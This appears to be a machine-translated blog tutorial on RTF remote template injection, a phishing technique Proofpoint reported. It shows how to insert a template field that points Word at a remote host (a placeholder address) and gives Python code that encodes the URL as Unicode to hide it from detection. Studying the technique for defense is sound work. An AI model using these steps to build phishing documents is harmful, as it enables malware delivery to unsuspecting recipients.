Office RTF remote template injection

Time:2022-1-18

Remote template insert

   proofcoin recently wrote an article. The report mentioned that the number of office phishing attacks by RTF template injection has increased in recent years. I haven’t learned much about RTF template injection before. Now go and have a look with Xiaobian (laugh HHH).
   it is relatively simple to create doc template injection. Create an RTF document, edit it with office word, and write any content.
image
  after saving, you will find that the size of the document has changed from a few bytes to tens of KB. This is because a large number of RTF document format attribute field values are added.
image
   how to inject templates? RTF documents support a related control field: * \ template. The value of this field needs to be followed by the template name used, and the entire attribute field needs to be enclosed in curly braces.
image
  then open the previously saved RTF document directly with a text editor. For remote template injection, the inserted content is like: {\ * \ template hxxp://xx.xx.xx.xx:port/xxx.xxx }。 As for the insertion position, after testing, the remote template can be obtained after, before, or between braces. For example:
image
   insert the field, save the modification, and open it again with word. The template injection is successfully realized.
image
image

Unicode URL template insert

   further, the parameter value of the * \ template field can be Unicode, which can better hide itself. For how to convert ASCII to unicode representation, refer to [3] article as follows.
image
   Python code is expressed as follows:

def trans(url):
    return ''.join(['\\u'+str(-(0xffff+1-ord(c)))+'?' for c in url])

  how to make a self-made RTF Unicode template injection? Modify directly on the basis of the original\*\templateThe property value of is useless. According to the proof point article, it involves\*\wgrffmtfilterField, however, view the correspondingfile, and after some tests, it has nothing to do with the actual field. After comparing some relevant technologies on the network and using samples, it is found that this method should be the same as the header of RTF documents\ucField.
  \ucN: Specifies the current value in braces\uNThe number of bytes corresponding to the Unicode character represented by.
image
  now you only need to modify it\ucby\uc1(in the Chinese environment, it is saved as 2 by default), and then it is saved in the same way as in the first section\*\templateField is inserted into the document, which can be successfully implemented.
image

reference resources:

[1] https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread
[2] http://www.biblioscape.com/rtf15_spec.htm
[3] https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/

Recommended Today

Tutorial on sending e-mail using net:: SMTP class in Ruby

Simple Mail Transfer Protocol(SMTP)SendE-mailAnd routing protocol processing between e-mail servers. RubyIt provides the connection of simple mail transfer protocol (SMTP) client of net:: SMTP class, and provides two new methods: new and start New takes two parameters: Server name defaults to localhost Port number defaults to 25 The start method takes these parameters: Server – […]